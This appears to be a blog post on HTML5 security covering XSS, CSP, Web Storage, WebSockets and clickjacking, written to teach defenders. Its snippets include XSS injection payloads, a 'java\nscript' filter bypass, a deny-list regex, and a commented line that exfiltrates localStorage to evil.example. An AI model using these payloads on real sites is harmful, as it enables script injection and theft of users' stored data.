(With the historical perspective behind us, we dive into HTML5. This series concludes on Wednesday.)

Security (and Privacy) From HTML5

Most HTML5 security checklists rehash the recommendations and warnings from the specs themselves. It’s always a good sign when specs acknowledge security and privacy. Getting to that point isn’t trivial. There were two detours on the way to HTML5. WAP was a first stab at putting the web on mobile devices when mobile devices were dumb. And one of its first failings was the lack of cookie support.

XHTML was another blip on the radar. Its only improvement over HTML seemed to be that mark-up could be parsed under a stricter XML interpreter so typos would be more easily caught. XHTML caught on as a cool thing to do, but most sites served it with a text/html MIME type that completely negated any difference from HTML in the first place. Herd mentality ruled the day on that one.

CSRF and clickjacking are called out as security concerns in the HTML5 spec. For some developers, that may have been the first time they heard about such vulns even though they’re fundamental to how the web works. They’re old, old vulns. The good news is that HTML5 has some design improvements that might relegate those vulns to history.

The <video> element doesn’t speak to security; it highlights the influence of non-technical concerns on a standard. The biggest drama around this element was choosing whether an explicit codec should be mandated.

WebGL is an example of pushing beyond the browser into graphics cards. The hardware behind these cards doesn’t care about the Same Origin Policy, or even security, for that matter. Early versions of the spec had two major problems: denial of service and information leakage. It was refreshing to see privacy (information leakage) receive such attention. As a consequence of these risks, browsers pulled support. Early implementation allowed researchers to find these problems and improve WebGL. Part of its revision included attachment to another HTML5 security policy: Cross Origin Resource Sharing (CORS).

Like WebGL, the WebSocket API is another example where browsers implemented an early draft, revoked support due to security concerns, and now offer an improved version. For example, the WebSocket protocol includes a handshake and frame masking to prevent the kind of cross-protocol attacks that caused early web browsers to block access to ports like SMTP and telnet.
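The masking step is simple to sketch. Per the WebSocket protocol, every byte of a client-to-server payload is XORed with a random 4-byte key chosen per frame, so a malicious page can’t control the exact bytes that hit the wire (and, say, make them look like SMTP commands to a confused intermediary). A minimal sketch:

```javascript
// Sketch of WebSocket client-frame masking (RFC 6455): each payload
// byte is XORed with a rotating 4-byte key. The key is random per
// frame; a fixed key is used here only so the example is repeatable.
function maskPayload(payload, key) {
  const out = Buffer.alloc(payload.length);
  for (let i = 0; i < payload.length; i++) {
    out[i] = payload[i] ^ key[i % 4]; // rotate through the 4 key bytes
  }
  return out;
}

// Masking is symmetric: applying the same key twice restores the data.
const key = Buffer.from([0x12, 0x34, 0x56, 0x78]);
const masked = maskPayload(Buffer.from('GET / HTTP/1.1'), key);
const unmasked = maskPayload(masked, key).toString();
```

The point isn’t secrecy (the key travels in the frame header); it’s that the attacker can no longer predict or choose the raw bytes on the wire.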

These examples show us a few things. One, we shouldn’t be surprised at the tensions from competing desires during the drafting process. Two, secure design takes time. (Remember PHP?) And three, browser developers are pushing the curve on security.

It’s only a matter of time before XSS rears its ugly head during a discussion of web security. After all, HTML injection has tormented developers from the beginning. Early examples of malicious HTML used LiveScript, the original name for JavaScript. In 1995 Netscape offered a bug bounty for its browser. The winning exploit exposed a privacy hole and netted $1,000. Interestingly, the runner-up was a crypto timing attack that could, for example, reveal the secret key of an SSL server. Even if RSA has a secure design in terms of cryptographic primitives, vulns will appear in its implementation. That was merely a hint of the trouble to come for SSL/TLS.

Anyway, that was a nice $1000 bug in 1995. HTML injection continued to grow, with one of the first hacks demonstrated against a web-based email system in 1998. Behold, the mighty <img> tag using a javascript: URI to pop up a login prompt. That was just a few years after the term phishing had been coined.

So is there really an HTML5 injection? What terrible flaws does the new standard contain that its predecessors did not?

Not much. An important improvement from HTML5 is that parsing HTML documents is codified with instructions on order of operations, error handling, and fixup steps. A large portion of XSS history involves payloads that exploit browser quirks or bizarre parsing rules.

A key component of the infamous Samy worm’s success was Internet Explorer’s “fix up” of a javascript: token split by a newline character (i.e. java\nscript) into a single, valid URI. A unified approach to parsing HTML should minimize these kinds of problems, or at least make it easier to test for them. Last year a bug was found in Firefox’s parsing of HTML entities when a NULL byte (%00) was present. That was an implementation error; HTML5 actually provides instructions on how that entity should have been handled. The persistent danger will be a browser’s legacy support and non-standards (or relaxed-standards) modes.
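The java\nscript trick is easy to demonstrate. A hypothetical filter that checks the raw attribute value misses the split token, because the browser’s fix-up stripped the newline before interpreting the URI; normalizing the same way the browser does closes the gap. A sketch (both functions are illustrative, not a recommended sanitizer):

```javascript
// Naive check on the raw attribute value: bypassed by "java\nscript:".
function naiveIsJavascriptUri(value) {
  return value.toLowerCase().startsWith('javascript:');
}

// Strip ASCII control characters (tab, newline, etc.) the way a
// lenient parser would before comparing the scheme.
function normalizedIsJavascriptUri(value) {
  const normalized = value.replace(/[\x00-\x1f]/g, '').toLowerCase();
  return normalized.startsWith('javascript:');
}

const payload = 'java\nscript:alert(1)';
const naiveResult = naiveIsJavascriptUri(payload);           // false: bypassed
const normalizedResult = normalizedIsJavascriptUri(payload); // true: caught
```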

Sites with weak deny lists will suffer the most from the arrival of HTML5. HTML5 has new elements and new attributes that provide JavaScript execution contexts. If your site relies on fancy regexes to strip out all the cool hacks from the XSS cheat sheets you’ve been scouring, it’s still likely to miss the new tags of HTML5.
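A hypothetical deny list makes the problem concrete: a regex built from a fixed list of “dangerous” tags catches yesterday’s payloads and silently passes an HTML5 element carrying an event handler.

```javascript
// Hypothetical deny list: a fixed roster of known-bad tags.
const denyList = /<\s*(script|iframe|object|embed)\b/i;

const oldPayload = '<script>alert(1)</script>';
const html5Payload = '<video src=x onerror=alert(1)>'; // HTML5 element, not on the list

const catchesOld = denyList.test(oldPayload);  // true: blocked
const missesNew = denyList.test(html5Payload); // false: slips through
```

This is the core argument for allow lists (or contextual output encoding) over deny lists: the deny list must be updated every time the platform grows.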

The initial excitement around HTML5-based XSS was the autofocus attribute. A common reflection point for HTML injection is the value of an <input> element. Depending on the kind of payload injected, an exploit would require the victim to perform some action (submit the form, click a field, etc.). The autofocus attribute lets an exploit automatically execute JavaScript tied to an onfocus or onblur event.
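To illustrate (the reflection point is assumed; the payload is the widely published example): the attacker closes the value attribute, then adds autofocus so the onfocus handler fires with no user interaction at all.

```javascript
// A value reflected into an <input> attribute. The payload breaks out
// of value="..." and adds autofocus + onfocus.
const injected = '" autofocus onfocus="alert(1)';
const page = `<input type="text" value="${injected}">`;
// The browser parses this as:
// <input type="text" value="" autofocus onfocus="alert(1)">
// ...and fires the handler as soon as the field receives focus.
```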

There’s a cynical perspective that HTML5 will bring a brief period of worse XSS problems, courtesy of developers who embrace HTML5’s enhanced form validation while forgetting to apply server-side validation. There’s nothing misleading about HTML5’s approach to this. More pre-defined <input> types and client-side regexes improve the user experience. They’re not intended to be a security barrier. They’re a usability enhancement, especially for browsers on mobile devices.
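A sketch of the right division of labor: the same constraint expressed twice, once in markup for usability and once on the server as the actual control. (The zip field is a hypothetical example.)

```javascript
// One constraint, two homes.
const zipPattern = /^[0-9]{5}$/;

// Client side: markup the server emits. Nice for users, trivially
// bypassed by anyone sending a raw request.
const field = '<input type="text" name="zip" pattern="[0-9]{5}" required>';

// Server side: must run regardless of what the client claims.
function validateZip(input) {
  return zipPattern.test(input);
}

const okZip = validateZip('90210');          // true
const badZip = validateZip('90210<script>'); // false
```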

HTML5 offers distressingly few ways to minimize the impact of XSS attacks: <iframe> sandboxing and Cross Origin Resource Sharing controls. They help, but they don’t fundamentally change the design of the Same Origin Policy, which has the drawback that all content within an Origin receives equal treatment. Rather than providing least-privilege access, it’s a binary, all-or-nothing privilege. That’s unappetizing for modern web apps that want to implement everything from mashups to advertising to running third-party JavaScript within a trusted Origin.

The Content Security Policy (CSP) introduces design-level countermeasures for vulns like XSS. CSP moved from a Mozilla project to a standards track for all browsers to implement. A smart design choice is providing monitor and enforcement modes. Its implementation will likely echo that of early web app firewalls. CSP’s complexity has the potential to break sites. Expect monitor mode to last for quite a while before sites start enforcing rules. The ability to switch between monitor and enforce is a sign of design that encourages adoption: Make it easier for devs to test policies over time.
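The two modes are just two response header names. The names below are the standardized ones (early experimental versions carried vendor prefixes), and the policy string is only an example.

```javascript
// Monitor vs. enforce: the policy is identical, only the header name
// changes. Report-Only mode logs violations without blocking anything.
function cspHeader(policy, enforce) {
  const name = enforce
    ? 'Content-Security-Policy'
    : 'Content-Security-Policy-Report-Only';
  return { [name]: policy };
}

const monitor = cspHeader("default-src 'self'; report-uri /csp-report", false);
const enforced = cspHeader("default-src 'self'", true);
```

Running in monitor mode first, watching the violation reports, then flipping to enforce is exactly the adoption path the header design encourages.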

HTML injection deserves emphasis since it’s the most pervasive problem for web apps. But it’s not the only problem for web apps. Other pieces of HTML5 have equally serious concerns.

The Web Storage API adds key-value storage to the browser. It’s effectively a client-side database. Avoid the immediate jump to SQL injection whenever you hear the word database. Instead, consider the privacy implications of Web Storage. We must be concerned about privacy extraction, not SQL injection. Web Storage has already been demonstrated as yet another tool for insinuating supercookies into the browser. In an era when developers still neglect to encrypt passwords in server-side databases, consider the mistakes awaiting data placed in browser databases: personal information, credit card numbers, password-recovery answers, and more. And all of it just an XSS away from being exfiltrated. XSS isn’t the only threat, either. Malware has already demonstrated an inclination to scrape hard drives for financial data, credentials, keys, and the like. An unencrypted store of 5MB (or more!) of data is an appealing target. Woe to the web developer who thinks Web Storage is a convenient place to store a user’s password.
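The API itself is tiny, which is part of the danger: it invites casual use. The sketch below mimics the key-value interface with an in-memory shim (localStorage only exists in a browser); the comments show the mistake and the one-line exfiltration that an XSS makes possible.

```javascript
// In a real browser, the mistake and its consequence look like:
//
//   localStorage.setItem('password', 'hunter2');          // the mistake
//   new Image().src = 'https://evil.example/?' +
//       encodeURIComponent(JSON.stringify(localStorage)); // one XSS payload later
//
// Everything in Web Storage is plaintext, readable by any script on
// the origin, and persists on disk. The shim below just mirrors the
// key-value API for illustration.
const store = new Map();
const storage = {
  setItem: (k, v) => store.set(k, String(v)),
  getItem: (k) => (store.has(k) ? store.get(k) : null),
  removeItem: (k) => store.delete(k),
};

storage.setItem('theme', 'dark');   // fine: a preference, not a secret
const theme = storage.getItem('theme');
const missing = storage.getItem('password'); // null - keep it that way
```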

The WebSocket API entails a different kind of security. The easy observation is that it should use wss:// instead of ws://, just as HTTPS should be everywhere. The subtler problem lies with the protocol layered over a WebSocket connection.

Security controls like HTTPS, the Same Origin Policy, and session cookies don’t automatically transfer to WebSockets. For example, consider a simple chat protocol. Each message includes the usernames of the sender and recipient. If the server just routes messages based on usernames, without verifying that the sender’s name matches the WebSocket connection it arrived on, then it’d be trivial to spoof messages. Or consider an app that does verify the sender and recipient, but uses users’ session cookies to identify them. If the recipient receives a message packet that contains the sender’s session ID – well, I hope you see the insecurity there.
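The routing check is a few lines of server code. This is a hedged sketch, not a complete chat server: `conn.username` stands for the identity established at handshake time (a hypothetical shape), and the two rules are exactly the ones described above, namely that the claimed sender must match the connection, and session IDs never belong in a message body.

```javascript
// Validate a chat packet against the connection it arrived on.
// `sendTo` is an injected delivery function (hypothetical interface).
function routeMessage(conn, packet, sendTo) {
  if (packet.from !== conn.username) {
    return { ok: false, reason: 'spoofed sender' }; // rule 1
  }
  if ('sessionId' in packet) {
    return { ok: false, reason: 'session ID in message body' }; // rule 2
  }
  // Re-stamp the sender from the connection's verified identity.
  sendTo(packet.to, { from: conn.username, text: packet.text });
  return { ok: true };
}

const delivered = [];
const conn = { username: 'alice' };
const good = routeMessage(conn, { from: 'alice', to: 'bob', text: 'hi' },
                          (to, msg) => delivered.push([to, msg]));
const spoofed = routeMessage(conn, { from: 'mallory', to: 'bob', text: 'hi' },
                             (to, msg) => delivered.push([to, msg]));
```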

If there’s one victim of the HTML5 arms race, it’s the browser exploit. Not that browser exploits have disappeared, but they’ve become more complex. A byproduct of keeping up with (relatively) quickly changing drafts is that modern browsers are quicker to update. More importantly, self-updating browsers share features like plugin sandboxing, process separation, and even rudimentary XSS protection. Whatever your choice of browser, the only version number you need any more is HTML5.

That’s the desire. In practice, accelerating browser updates isn’t going to adversely affect the pwn-to-own and exploit communities any time soon. IE6 refuses to disappear from the web. Qualys’ BrowserCheck stats show that browsers still tend to be out of date. Worse, plugins remain out of date even when the browser is patched. In other words, Flash and Java deserve finger-pointing for exposing security holes. When was the last time Adobe released a non-critical Flash update?

Browser security isn’t restricted to internal code. A header like X-Frame-Options offers an easy defense against clickjacking. New HTML5 capabilities like the sandbox attribute for iframes would defeat JavaScript-based frame busters intended to block clickjacking. With one fell swoop of security design (and adding a single header at your web server), it should be possible to get rid of an entire class of vulnerability. The catch is getting sites to implement it.
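The one-line defense mentioned above looks like this in practice. (The helper function and the widget URL are illustrative; the header and attribute are the real mechanisms.)

```javascript
// The single anti-clickjacking header a server adds to its responses.
function antiClickjackHeaders() {
  return { 'X-Frame-Options': 'DENY' }; // or 'SAMEORIGIN' to allow self-framing
}

// And the flip side: what an embedding page can impose on framed
// content. A bare sandbox attribute disables scripts in the frame,
// which also disables JavaScript frame busters.
const framed = '<iframe src="https://example.com/widget" sandbox></iframe>';

const headers = antiClickjackHeaders();
```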

The browser needs the complicity of sites in order for a feature like X-Frame-Options to matter. It’s one thing to scrutinize the design of a half-dozen or so web browsers. It’s quite another to consider the design of millions and millions of web sites.

There is a looming XSS threat, but it’s a byproduct of the ecosystem building around HTML5. Heavy JavaScript libraries have become major components of modern web apps. JavaScript is a challenging environment for security. Its interaction with the DOM is restricted by the Same Origin Policy. On the other hand, its prototype-based design and global namespaces let any script on the page alter the behavior of any other.

JavaScript libraries are great. They reinforce good programming patterns and provide functionality that would otherwise have to be created from scratch. The flip side of libraries is that they offer additional exploit vectors and need to be maintained.

Let’s return to the idea of deny lists to discuss the other insidious aspect of XSS. These libraries also have functions that expose eval(), DOM manipulation, and XHR calls, among others. By no means is there anything insecure or inadvisable about this. All it does is magnify the impact if an XSS vuln already exists on the site – which isn’t likely to be in the JavaScript library itself.